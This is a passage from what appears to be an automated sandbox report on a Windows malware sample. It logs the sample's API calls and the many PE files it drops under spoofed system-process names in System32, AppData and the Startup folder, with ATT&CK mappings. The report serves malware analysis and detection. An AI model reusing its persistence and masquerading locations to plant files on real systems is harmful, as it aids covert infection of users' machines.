(UID: 00000000-00003964)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004124)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004340)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003836)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002164)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002428)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003628)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004088)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003756)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004308)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003916)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003360)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002380)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006140)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006120)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003668)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004300)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"IsWow64Process\" with parameter \"5816\" - (UID: 00000000-00005816)\n \"D3_08.exe\" called \"IsWow64Process\" with parameter \"5972\" - (UID: 00000000-00005972)\n \"IExplorer.exe\" called \"IsWow64Process\" with parameter \"6136\" - (UID: 00000000-00006136)\n \"WINLOGON.EXE\" called \"IsWow64Process\" with parameter \"4272\" - (UID: 00000000-00004272)\n \"CSRSS.EXE\" called \"IsWow64Process\" with parameter \"4132\" - (UID: 00000000-00004132)\n \"SERVICES.EXE\" called \"IsWow64Process\" with parameter \"3836\" - (UID: 00000000-00003836)\n \"LSASS.EXE\" called \"IsWow64Process\" with parameter \"3096\" - (UID: 00000000-00003096)\n \"SMSS.EXE\" called \"IsWow64Process\" with parameter \"4308\" - (UID: 00000000-00004308)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"bf010235\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"bf010235\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"bf010235\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"bf010235\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"bf010235\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"bf010235\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"bf010235\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"bf010235\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"bf010235\"\n \"cx\": \"1\"\n \"cy\": \"1\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindFirstFileA\" with parameter C:\\\\msvbvm60.dll (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter D3_08.exe (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00005816)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"D3_08.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"IExplorer.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WINLOGON.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"CSRSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SERVICES.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"LSASS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SMSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"4\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"276\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"348\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"388\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"396\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"456\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"472\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"504\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"512\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"604\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"680\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"772\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"824\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"856\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"896\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1116\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1256\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1296\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1456\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1560\"}\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1608\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"\\Device\\KsecDD\"\n \"D3_08.exe\" opened \"\\Device\\KsecDD\"\n \"IExplorer.exe\" opened \"\\Device\\KsecDD\"\n \"WINLOGON.EXE\" opened \"\\Device\\KsecDD\"\n \"CSRSS.EXE\" opened \"\\Device\\KsecDD\"\n \"SERVICES.EXE\" opened \"\\Device\\KsecDD\"\n \"LSASS.EXE\" opened \"\\Device\\KsecDD\"\n \"SMSS.EXE\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\D3_08\\New Folder.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\Users\\HAPUBWS\\AppData\\Local\\lsass.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46965 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46871 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46780 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46915 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46828 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46792 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46867 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46823 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46919 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46918 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46860 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46863 bytes starting with PE header signature to file \"C:\\D3_08\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46809 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46839 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46865 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46932 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 47005 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46861 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46754 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46844 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46941 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46937 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46891 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46837 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46865 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 